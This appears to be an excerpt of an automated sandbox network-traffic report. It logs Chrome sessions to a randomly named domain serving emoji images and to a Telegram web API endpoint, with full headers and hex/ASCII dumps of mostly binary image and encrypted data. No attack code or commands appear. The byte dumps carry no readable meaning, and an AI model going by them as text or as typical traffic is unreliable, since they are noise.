                                  2025-01-12 00:04:02 UTC487INData Raw: 78 53 4d 14 1b 2f 5d ba ce f9 73 7c ac 39 f1 6d 52 94 5c ce e2 51 3a 15 61 e7 36 87 96 68 33 23 b4 10 f1 80 87 37 68 7c de 44 70 f8 22 58 56 4f 87 20 ec 15 94 84 77 1e 2d 5e a9 d8 63 ac b5 b3 2a 68 a2 5d d1 10 45 a8 cc e8 db 2a d5 6e 6c 43 75 6d 6a 08 80 c0 ad 44 d6 94 46 05 03 30 7c 2f 3e fa 28 d2 85 3b 38 57 c4 5b 54 14 f2 5e 41 57 bc f4 58 f2 96 63 02 08 b9 40 71 54 1c 05 2a 11 a5 69 91 e7 e0 aa d9 4e 8d 76 10 ce 02 ad dc 4e 66 9a b6 98 15 ce a3 9a d8 21 b3 fe 20 86 af 9c 78 8f a8 86 bd 82 9e 0e 7a f5 86 37 62 4a 7e 13 32 de 80 46 f3 1c 10 00 03 08 30 a7 a9 31 b4 b1 9d b9 8d e9 d9 98 9a d7 1f a2 ba 3e c5 f5 71 39 fb d2 3c 28 fb 8a fa 3e a8 26 43 35 5b 46 33 89 a4 59 c9 d4 2b 80 52 a8 98 c7 93 a1 47 18 a8 6a 6d 6c 67 6e dc cc 9b 5f d6 a6 fc 59 5c 7f e9
                                  Data Ascii: xSM/]s|9mR\Q:a6h3#7h|Dp"XVO w-^c*h]E*nlCumjDF0|/>(;8W[T^AWXc@qT*iNvNf! xz7bJ~2F01>q9<(>&C5[F3Y+RGjmlgn_Y\


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  105192.168.2.650022172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:01 UTC370OUTGET /img-apple-160/1f1e6-1f1f4.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: image/png
                                  Content-Length: 4635
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-121b"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FG9hUx7Db5Aa13bwXj8b1LzbdiMiv2oy%2FoTWSwv%2BH5FrFJsFIo5NJsZbYUK5OYW0Rt1oWBF2NmqRe1E8nRaLc731%2FwNWRO6%2FKuKidKq8wgljS4Q0RWLiB4hc01Id%2FO7Xx81YOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3059ff4727a-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1795&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1588683&cwnd=224&unsent_bytes=0&cid=3dc6d283e069f09d&ts=159&x=0"
                                  2025-01-12 00:04:01 UTC468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 51 34 37 0a 0a 0a b3 69 71 19 0d 0e b0 63 6b 0c 0c 0c b8 6f 77 b3 6a 72 0b 0b 0b bb 72 7a 0c 0c 0c 0c 0c 0c b1 66 6d 8d 20 2d 61 1c 24 16 16 16 0b 0b 0b b5 6c 74 9a 33 3f 08 08 08 77 09 15 34 04 09 03 03 03 b0 68 70 90 34 3d 0c 0c 0c ba 71 78 0c 0c 0c b2 69 71 0b 0b 0b b2 68 6f 0e 0e 0e bb 71 79 07 07 07 0b 0b 0b ae 66 6d ba 71 79 11 11 11 0e 0e 0e ba 71 78 92 37 41 07 07 07 04 04 04 12 12 12 b8 6f 77 06 06 06 03 03 03 ff ff 37 ff f9 39 ff f6 38 ff f2 38 fe ee 37 fe eb 37 fe e8 38 fd e3 37 ff e0 38 f9 e0 37 fb dd 38 f9 da 37 f7 d8 36 f3 d5 36 ed ce 37 f6 c8 39 f1 bb 3a df c5 34 d7 bf 35 ed a8 3b cd b6 32 eb 9b 3c c1 ac 32 e8
                                  Data Ascii: PNGIHDRPLTEGpLQ47iqckowjrrzfm -a$lt3?w4hp4=qxiqhoqyfmqyqx7Aow7988778787876679:45;2<2
                                  2025-01-12 00:04:01 UTC1369INData Raw: 28 39 d0 20 46 b2 30 3e 63 5c 2a c7 26 37 c3 25 36 cf 1b 46 c5 23 34 c2 23 34 b7 28 37 9e 32 3e c2 21 32 be 22 33 c0 20 31 ac 29 37 cb 1a 2d be 1f 30 b9 21 30 92 32 3c be 1d 2e b3 21 31 cc 0f 47 bc 1c 2d 57 50 28 b8 1d 2d ab 22 31 ba 1a 2b b2 1c 2c c5 13 26 b8 19 29 b6 18 29 9b 22 2f b3 17 27 bd 12 24 b5 15 26 ac 19 29 84 2a 33 b1 14 25 b3 12 24 af 13 23 b2 11 22 49 45 28 5d 39 2e ad 11 22 af 10 21 8c 1f 2a ad 0f 1f aa 0f 20 ac 0e 1e a6 0e 1f 9f 0e 1e 92 14 21 96 0e 1c 77 1b 2a 95 0e 1b 95 0d 1b 63 23 2c 3b 37 26 7e 11 1d 88 0b 18 31 2f 26 48 22 26 7a 0a 16 75 0a 16 28 27 26 26 26 26 25 25 25 24 24 24 1d 25 24 22 22 22 57 09 11 21 21 21 1f 20 20 3a 13 17 1e 1f 1f 1d 1e 1e 10 24 21 2d 15 1a 1c 1c 1c 1b 1b 1b 1a 1a 1a 17 19 24 19 19 19 18 18 18 11 1b 1a 07
                                  Data Ascii: (9 F0>c\*&7%6F#4#4(72>!2"3 1)7-0!02<.!1G-WP(-"1+,&))"/'$&)*3%$#"IE(]9."!* !w*c#,;7&~1/&H"&zu('&&&&%%%$$$%$"""W!!! :$!-$
                                  2025-01-12 00:04:01 UTC1369INData Raw: 5b 3f ac 05 3a d6 8d 24 e8 09 54 c8 16 10 e7 cc e9 02 71 c6 62 69 74 80 09 74 01 31 6b 80 72 57 58 a9 57 d7 03 aa a0 67 05 3d 90 c6 a9 03 bd af 05 74 6c 00 f4 b7 5a 3e 59 38 7a 58 4d 5c e0 aa bd 80 a8 35 40 fc 4b ba ae 0a 9e 2e 50 43 06 d4 ac 01 6a 3a 40 8d 05 26 8a c9 e4 bf bd 22 0b 6a ea b2 c5 1e 5d d2 0d 54 62 2d d0 72 7a 40 ef f3 2e 03 c6 75 03 85 13 ce 18 0c 19 50 16 9e a9 c9 a0 5e 0e 1a c1 f9 97 be 4e b1 96 a8 8d 81 04 5b 0f 6c 8d d6 76 80 fe f9 21 f1 d8 52 e8 54 e4 e2 d1 ab 26 16 1a 0b 3b a9 46 27 02 73 6c 09 50 d3 02 5a 3a c0 8c 66 68 8e 81 6e 03 d3 1b a6 f5 7c b1 f2 74 25 02 81 73 d1 c8 b5 cf bf 50 bc 76 b5 14 75 77 89 3a 11 98 d2 91 67 0e 34 06 d6 00 c1 73 f1 f2 0e f0 e8 8b 95 48 08 c0 35 18 b7 25 b5 f3 83 4b 16 03 6a 3b 80 16 8c 6d 01 75 b6 c0
                                  Data Ascii: [?:$Tqbitt1krWXWg=tlZ>Y8zXM\5@K.PCj:@&"j]Tb-rz@.uP^N[lv!RT&;F'slPZ:fhn|t%sPvuw:g4sH5%Kj;mu
                                  2025-01-12 00:04:01 UTC1369INData Raw: 0b 18 17 32 10 80 ab b9 89 57 6e 4b 42 20 49 26 ef de 77 28 11 b4 e2 76 bf 76 7b 1c 6a 23 3f f3 a1 59 b6 14 e8 5f 3e be 68 35 28 e9 e3 95 2c 0e 91 66 05 12 67 70 58 e4 de 1b 5f 1f 76 80 ad 17 7f e5 37 cb 6f 08 b2 88 f3 7f fb c5 82 0d 74 f1 6f 6c bc 0d 40 87 ff d3 fd 59 f8 d1 58 80 d8 58 8c c3 3a 9c c9 1e 31 67 ff e0 56 9d f3 4f c6 62 e6 4f cf 3e 6c 84 9f e6 ac c3 b7 c6 51 ed bd 9f 59 38 af ca f6 01 9d 73 b4 fe 2f d0 d9 94 65 2d 27 00 1d e7 3c f0 cf 22 e7 ab ae 93 b1 4f df 90 f5 4a f0 ee 1b 67 87 1a f9 bf 78 ff d1 92 e8 33 d0 46 7b ee 7c ba 11 2a 00 17 cb 99 3b cf 7b 2d 11 ee 7d 5f fe a7 50 55 f7 3d f8 82 80 7e 03 6d 7e e6 c9 fb 17 4c a0 04 a0 1b e3 9f be be fc 46 b3 43 6a b9 78 62 ff 62 f5 1d 00 c4 06 67 95 1f ff 7a a9 a6 42 01 ae 21 77 dd f1 fe a3 37 97
                                  Data Ascii: 2WnKB I&w(vv{j#?Y_>h5(,fgpX_v7otol@YXX:1gVObO>lQY8s/e-'<"OJgx3F{|*;{-}_PU=~m~LFCjxbbgzB!w7
                                  2025-01-12 00:04:01 UTC60INData Raw: c9 00 38 00 0e 80 1b 64 00 1c 00 07 c0 0d 32 00 0e 80 03 e0 06 19 00 07 c0 01 70 83 0c 80 03 e0 00 b8 41 06 40 9f ff 03 f2 03 33 91 e6 19 9e a3 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: 8d2pA@3IENDB`


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  106192.168.2.650029149.154.167.99443
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:01 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:04:02 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  107192.168.2.650041172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC608OUTGET /img-apple-160/1f1e6-1f1fa.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC900INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 6383
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-18ef"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IGdN3tkfP0%2FTESjDXi3PTxBTbqG0CtSlu07jQgUNyaAHhi22rFBSoq4%2BF0mq%2Fyayog8mCu0UCK2crGNZhEkqCWlwtHj1mtVdg15uStw9pAmqVMxkU58idxjQE%2FnWIArrPOy4Og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30a490c8cba-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1832&rtt_var=689&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1585233&cwnd=218&unsent_bytes=0&cid=6bcf0b92ac48d66a&ts=606&x=0"
                                  2025-01-12 00:04:02 UTC469INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 71 7e 9a 0e 21 48 c0 8b 91 24 28 4c 78 75 92 0b 1d 42 ca cc cc 0b 1e 44 67 77 98 0f 22 48 ba 5d 69 66 77 98 c2 bd c0 0b 1e 43 60 71 92 17 2f 5f c1 6e 79 0c 1e 44 08 1a 40 63 74 95 a6 ad aa 02 19 47 8e 8a 8d c7 74 7e 87 09 18 81 4b 5a 67 78 99 0c 20 45 60 70 91 c2 a1 a4 63 74 95 c5 71 7d 0b 1e 43 bc bd c1 ca d5 d5 6a 7b 9b 60 70 91 0d 1f 45 c1 6a 75 6a 7a 9b 9d 2e 3c 0c 1f 44 6c 7d 9e 5e 6f 90 0b 1e 43 a8 55 5f c9 d4 dd c5 c4 c5 3e 54 7f c0 6e 79 82 93 b5 fc fb fa f1 ff fc fb f8 f4 e5 ff fe f5 f7 f7 f9 f3 ec f3 f2 f2 e1 f8 f7 f0 f0 ef ec ed ee de f1 ef f7 e3 e4 e9 e9 e7 d9 eb e8 e5 e5 e3 f2 d9 db e0 e0 e0 f6 ce d2 f9 c2 c8 df
                                  Data Ascii: PNGIHDRPLTEGpLq~!H$(LxuBDgw"H]ifwC`q/_nyD@ctGt~KZgx E`pctq}Cj{`pEjujz.<Dl}^oCU_>Tny
                                  2025-01-12 00:04:02 UTC1369INData Raw: 8e d9 03 1e 23 48 8f d0 05 1f 22 47 8e b7 0f 25 21 45 8d 20 44 8a 1f 44 8c 1f 43 8a c9 02 18 1d 42 89 c0 01 16 1a 3f 87 ab 08 1a 19 3d 84 17 3c 84 05 3f 8c 99 08 19 1a 37 6f 0f 38 85 12 36 7e 1b 35 6a 10 35 7c 10 34 7a 19 32 64 15 32 69 0e 32 7a 09 32 81 86 07 16 0d 31 78 0b 30 77 15 2e 5f 0a 2e 75 14 2c 5a 07 2c 73 03 2c 7b 0c 2b 67 07 2b 70 05 2a 71 12 29 54 59 0c 29 05 29 6f 04 28 6d 0a 27 60 12 26 4d 00 26 77 03 26 6c 01 25 6c 02 25 69 09 23 56 00 22 70 00 23 69 01 22 63 0c 20 49 00 1e 6b 01 20 5c 01 1d 54 08 1c 43 00 18 65 01 1a 4a 04 18 3e 00 18 48 00 10 60 00 15 41 01 14 3a 00 05 56 00 08 42 51 69 9a 33 46 6f 1f 3f 7d 5b 6d 90 5f 71 95 47 62 97 69 7a 9c 35 4e 80 2a 4b 8a bf 62 6e 45 5a 85 39 54 88 63 75 99 c5 8b 92 19 3a 7a 0f 2f 70 1c 39 73 c8 cd
                                  Data Ascii: #H"G%!E DDCB?=<?7o86~5j5|4z2d2i2z21x0w._.u,Z,s,{+g+p*q)TY))o(m'`&M&w&l%l%i#V"p#i"c Ik \TCeJ>H`A:VBQi3Fo?}[m_qGbiz5N*KbnEZ9Tcu:z/p9s
                                  2025-01-12 00:04:02 UTC1369INData Raw: 76 37 c0 99 f1 d8 9d 8c c3 a1 e2 11 74 ef 42 46 ae 31 58 b8 86 99 a8 2a 50 e7 46 21 9f f4 a5 0e 54 9b 80 35 9b 80 d7 bb db ac f2 10 81 63 41 2e 18 a7 8c 1e 20 9c e4 76 df 4b 0c c0 1f 06 9f 8b f8 13 7b ae 94 96 66 04 4e 58 ad 36 47 e0 bd b9 b9 07 74 c0 32 6a 99 70 1e cb a0 93 9d 9d 73 84 13 33 3d 6a 47 69 9a 8f c1 71 4d 68 5a 71 41 49 7a 28 f8 42 32 3b b5 e5 5e 40 a8 90 de 84 5a 17 b0 f9 3a 35 c2 c7 04 0e c1 c2 94 d9 e8 d9 83 c6 1d 81 7f f9 7e f0 bf c4 21 61 c9 8d 15 15 85 4e 9e c3 6a 13 08 24 a3 4f e7 46 5d 99 1b 0e 73 16 66 83 0d 02 47 81 15 d3 0c 8f c2 ec 5a e7 cc 12 ae d1 44 e6 15 ab 8a 13 83 e8 e5 ed ac bd f8 c6 76 11 05 55 b8 01 b8 d2 4a 8c 27 f1 f9 00 e4 4b ff 4a 11 46 bf 81 df ff e5 cf e6 ef 24 1c de c3 8a c6 8a 73 0f 79 13 36 9b 03 b3 29 27 1f cd
                                  Data Ascii: v7tBF1X*PF!T5cA. vK{fNX6Gt2jps3=jGiqMhZqAIz(B2;^@Z:5~!aNj$OF]sfGZDvUJ'KJF$sy6)'
                                  2025-01-12 00:04:02 UTC1369INData Raw: 1c ff e9 27 5f a0 6b d0 bb 41 20 6e 6a d0 b3 c2 27 54 ea e2 12 da 16 1b 19 4a db 02 24 0a cb 2c cc ab 3a 6d 2d b4 e7 05 7c 7d 75 1b 20 31 cd b0 c1 5c c2 67 25 11 8f 7c 00 df bf 73 c8 ea d8 ff 30 a3 b4 11 52 5f e1 d5 a0 37 b0 04 a2 2a c8 f2 f4 86 b3 c5 99 f6 4a 1d d8 1a dc 2b bb 19 58 5b a7 b0 5f 7b a9 6f ba e6 03 48 ce 25 09 6d 30 38 71 c4 af 6e dd f0 35 0f fe f1 b6 42 c8 65 86 3b 93 0f 1f 2b ad 70 df 80 65 65 9e 4d 78 b6 78 c3 12 43 6b d1 91 e1 68 8e d6 2c 44 1d 8c 82 d1 f5 00 63 46 a7 6f aa 2c 07 91 37 b0 bc 49 a7 9b c5 32 89 97 96 aa 15 9f 4b 4c 51 f7 38 1c cc 21 b7 fd f8 9d af 89 fa 87 41 f3 ad 1f 15 42 1e 93 c9 0a dd 0f cc ec a3 27 4f 9e 39 5b 56 0d 41 d0 33 6f 1a 2c ce da ab a1 c3 8e 4d cf 57 c1 18 93 1e 8b d6 38 00 19 1b 2e 78 03 2b 6b 94 96 5e 0b
                                  Data Ascii: '_kA nj'TJ$,:m-|}u 1\g%|s0R_7*J+X[_{oH%m08qn5Be;+peeMxxCkh,DcFo,7I2KLQ8!AB'O9[VA3o,MW8.x+k^
                                  2025-01-12 00:04:02 UTC1369INData Raw: 0c 5c 53 5a 8c 01 60 7a 9e 13 38 a1 94 35 d2 a8 ef dc b9 f0 ec 33 db b9 73 3d bd eb 69 51 80 59 64 32 d9 3d 50 8b 41 60 96 cb 66 8d f5 41 18 43 cc 6c 38 86 5c 5b 25 51 e4 16 e7 17 e6 cf 06 a8 9e c5 c6 80 8f 7e cf 09 9c 28 0a 30 f3 59 5c e8 00 04 de c5 8b 63 63 5f 20 fb fb 00 3e 7c f0 40 e9 47 e9 e3 81 3f 7c fe eb 18 e4 e2 57 5f 7f 77 e9 02 35 4a bf 17 20 7c 61 ed 00 4c 56 ff 7c f6 db a5 5f c6 c7 c7 2b 8f 03 d3 d3 4c 54 fe c0 80 b4 24 d1 a1 69 35 81 40 1d ae e1 1f 1a 90 66 c2 a1 5a 2d 18 84 91 e5 07 0a 94 24 e9 ff 0a 54 7c a7 06 9c a2 a5 fa 3b 01 a5 ff 18 48 af ad d5 4e 00 f4 7a 7d 67 04 cc f4 ba 18 43 c0 1f 0f 73 a6 40 89 e9 19 64 a6 3a 03 35 da 7b 02 c6 65 62 20 40 03 10 7c a1 a0 57 07 d4 6c c6 80 30 5b d2 0d 72 ba 07 c2 d7 ad f8 11 20 3b 8a 4c 79 06 80
                                  Data Ascii: \SZ`z853s=iQYd2=PA`fACl8\[%Q~(0Y\cc_ >|@G?|W_w5J |aLV|_+LT$i5@fZ-$T|;HNz}gCs@d:5{eb @|Wl0[r ;Ly
                                  2025-01-12 00:04:02 UTC438INData Raw: f6 39 f0 77 d7 a4 37 36 a4 75 36 d2 29 c4 51 6f 57 ab cb 42 a9 3c 7f 6c 7e 3d 00 ac 3a 20 8f f0 10 47 c8 c0 47 d3 cf b7 8e 75 43 ef 67 de 4f da 09 1a e3 84 69 6c 6b 69 29 d2 28 95 c4 91 0c 7d 57 38 26 1b 72 84 eb f9 41 28 a3 04 89 65 59 14 2a cb b3 2c 4d 07 80 3c c2 57 2d 10 32 c0 7d 23 9c 3d 3c bd fd 74 da 20 f0 8e de 3b c3 c0 c8 32 a6 7d ea 6d 14 23 d7 86 70 c6 a3 c1 6c d7 97 71 82 42 a5 40 b8 16 58 d7 d5 62 41 07 7f fe 24 24 e0 3e 01 a7 fa 70 4f 6b 12 9a de b5 81 cc d0 fe b6 45 32 70 1d 7b 74 c1 c6 c2 93 09 0a 07 80 20 5c f2 c1 e3 14 79 86 e6 f5 07 00 4d fa 8b d6 1f 7a b1 8c 68 07 1d 2d 89 42 4f 0c d3 86 91 ae 8c 61 84 de 1a 60 08 c0 b2 82 83 27 23 20 e7 10 18 f1 bb 37 d3 0c 9e b3 f8 55 14 b4 f3 6d 07 ba 8f 32 a4 75 b6 58 86 1b dd 3a 2f 9f 25 c2 78 dd
                                  Data Ascii: 9w76u6)QoWB<l~=: GGuCgOilki)(}W8&rA(eY*,M<W-2}#=<t ;2}m#plqB@XbA$$>pOkE2p{t \yMzh-BOa`'# 7Um2uX:/%x


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  108192.168.2.650037149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 184
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC184OUTData Raw: 2a 10 06 78 25 cb 00 4d f7 25 d0 f3 5e 10 23 6d fd 4d 8e a1 5e 9b 1e 51 b6 58 18 14 ea be d2 a4 fb 06 23 50 b4 47 c7 4d b7 d0 51 b0 ac 62 ff eb cd 5f 2e 76 88 71 c5 06 be 34 13 07 5a 2b 3f 39 98 2e 83 27 3e c5 e5 91 af 0a 23 1c df a0 29 ce 42 f8 49 24 dd a8 b7 ce bd 7e d6 ad 34 32 85 8f d6 5d 2f 08 04 e6 29 60 58 07 58 14 fa 87 a0 27 73 de b2 6f 09 86 90 af 20 bb 11 9c a7 07 7a 6e 2d 91 e4 84 08 36 ae 04 ab df 3b fd da 6d f6 17 89 8d 21 df fc 7d 4a 1f a3 da ee 0c b6 3c 33 f8 bc 8f 53 3e 35 5f ad 40 dd eb bc 0b 7f 82 ed bd 97 f5 64 ad a1 68 13 86
                                  Data Ascii: *x%M%^#mM^QX#PGMQb_.vq4Z+?9.'>#)BI$~42]/)`XX'so zn-6;m!}J<3S>5_@dh
                                  2025-01-12 00:04:02 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:02 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d 05 36 02 70 ec 68 e6 18 1a 58 b8 40 02 54 6b d3 c2 6c 02 24 f4 44 aa fc 97 6e 2a 3b d6 5b ba f0 bb b8 ad 20 ed 62 fc db f4 a9 48 2a 6d 76 9c 92 2f 6e 42 e0 65 72 e8 c2 03 04 c9 cd e7 f5 ad a9 30 3e ea b3 00 9e 11 26 0a f3 ad 9a 99 d6 5e 11
                                  Data Ascii: *x%M6phX@Tkl$Dn*;[ bH*mv/nBer0>&^


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  109192.168.2.650042172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC370OUTGET /img-apple-160/1f1e6-1f1ee.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC907INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 5772
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-168c"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ij6J7S%2F5JSd6Om1LIveQ0HWcDYJrf7NsWnIP%2FzQMuVwOITkgUKSlUSg%2FafU%2FwEfcYnl1nq6wJs2t38E5id3r1GXXDX%2B3vcVGGe%2B%2BYQc7GUon2CFLIfUz5a3KF%2FA4vj0rxS97ZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30a9cfcc344-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1519&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1806930&cwnd=215&unsent_bytes=0&cid=811fa00a07dcfd4e&ts=151&x=0"
                                  2025-01-12 00:04:02 UTC462INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 4e 49 6f 13 0c 35 6b 65 88 15 0f 39 71 6b 8e 12 0c 36 16 10 3a 6a 5f 82 1e 16 4c 78 6e 8f 10 0b 34 86 8d a5 0f 09 34 6d 63 86 12 0c 37 4f 4a 70 a0 ac a9 93 4b 4a 09 01 36 94 03 03 8f 89 8e 6b 66 8b 11 0b 35 a2 9d b0 7b 3c 50 9c 7a 8a a3 69 79 67 62 87 13 0d 37 6d 68 8d 10 0b 34 a7 a4 b1 13 0c 37 b6 65 6d 6c 67 8b 14 0e 38 0c 06 31 a4 4a 4b cc 6e 6f 8d 87 9f 9c 1e 25 70 6a 93 65 60 87 bf ca dd f5 ff ff fa fa fa ec ff ff ff ff cb f6 f6 f5 e0 ff fe ef f7 fe f2 f2 f1 fb ec e8 e1 f4 fb e5 e9 ef e8 e9 e7 de ea fb f9 e0 e0 ea e7 d9 e4 e4 e4 e7 ea bc dc e3 f1 ec ed 8a e1 e0 df f7 d5 d5 eb dd c9 d7 dd e8 e9 d5 b8 fc c7 c5 de df 92 d3
